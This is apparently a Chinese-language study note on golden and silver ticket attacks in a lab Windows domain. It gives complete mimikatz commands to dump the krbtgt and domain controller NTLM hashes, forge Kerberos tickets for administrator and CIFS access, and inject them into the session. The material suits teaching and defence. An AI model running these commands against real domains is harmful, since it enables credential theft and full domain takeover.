前言
前面写过哈希传递攻击,这次写的票据传递攻击是跟域渗透有关的。也终于学到了黄金票据与白银票据,由于之前没学kerberos,所以耽误了非常久。
黄金票据
Golden Ticket(下面称为金票)是通过伪造的TGT(TicketGranting Ticket),因为只要有了高权限的TGT,那么就可以发送给TGS换取任意服务的ST。可以说有了金票就有了域内的最高权限。
每个用户的Ticket都是由krbtgt的密码Hash来生成的,那么,如果拿到了krbtgt的密码Hash,其实就可以伪造任意用户的TICKET,
对于攻击者来说,实际上只要拿到了域控权限,就可以直接导出krbtgt的Hash值,再通过mimikatz即可生成任意用户任何权限的Ticket,也就是Golden Ticket。
上面的内容,转载于文末,师傅总结的非常到位,我就直接复制粘贴过来了。
获取krbtgt的Hash
mimikatz.exe "lsadump::dcsync /domain:god.org /user:krbtgt" "exit"
获取到Hash NTLM为58e91a5ac358d86513ab224312314061
生成黄金票据
whoami /user
获取sid
这里我们不要最后一个-
后面的所有内容,所以获取到的sid是S-1-5-21-2952760202-1353902439-2381784089
/admin:伪造的用户名
/domain:域名称
/sid:SID值,注意是去掉最后一个-后面的值
/krbtgt:krbtgt的HASH值
/ticket:生成的票据名称
伪造administrator用户,并在当前目录下会生成golden.kiribi文件
mimikatz.exe "kerberos::golden /admin:administrator /domain:god.org /sid:S-1-5-21-2952760202-1353902439-2381784089 /krbtgt:58e91a5ac358d86513ab224312314061 /ticket:golden.kiribi" "exit"
导入伪造的黄金票据
为了能顺利导入伪造的黄金,使用klist
查看Kerberos 票证缓存
可看到有很多缓存票据,使用kerberos::purge
,清空缓存票据
现在无法访问域控中的文件
使用kerberos::ptt golden.kiribi
导入伪造的黄金票据
现在可成功访问域控文件
上面的命令整理成一句话就是
mimikatz.exe "kerberos::purge" "kerberos::ptt golden.kiribi" "kerberos::list" "exit"
白银票据
Silver Tickets(下面称银票)就是伪造的ST(Service Ticket),因为在TGT已经在PAC里限定了给Client授权的服务(通过SID的值),所以银票只能访问指定服务。
白银票据认证流程
白银票据的服务列表
服务名称 同时需要的服务
WMI HOST、RPCSS
PowerShell Remoting HOST、HTTP
WinRM HOST、HTTP
Scheduled Tasks HOST
Windows File Share CIFS
LDAP LDAP
Windows Remote Server RPCSS、LDAP、CIFS
先到域控导出ntlm hash,找到域控的主机名+$,我这里的域控主机名是OWA,所以应该找到OWA$
privilege::debug
sekurlsa::logonpasswords
获取到NTLM为2312094791e73c34a26e4525823556f3
切换到普通用户,获取到SID,一样不要-
最后的部分
SID为S-1-5-21-2952760202-1353902439-2381784089
/domain: 当前域名称
/sid: 获取到的sid值
/target: 域控主机名全称
/service:目标服务器上面的kerberos服务,此处为cifs
/rc4: 域控账户的NTLM hash
/user: 要伪造的用户名,此处可用silver测试
mimikatz.exe "kerberos::purge" "kerberos::golden /domain:god.org /sid:S-1-5-21-2952760202-1353902439-2381784089 /target:owa.god.org /service:cifs /rc4:2312094791e73c34a26e4525823556f3 /user:silver /ptt" "exit"
区别
访问权限不同
黄金票据:伪造TGT,可以获取任何Kerberos服务权限
白银票据:伪造TGS,只能访问指定的服务
加密方式不同
黄金票据由krbtgt hash加密
白银票据由server hash加密
认证流程不同
黄金票据的利用过程需要访问KDC
白银票据跳过KDC直接访问对应的服务器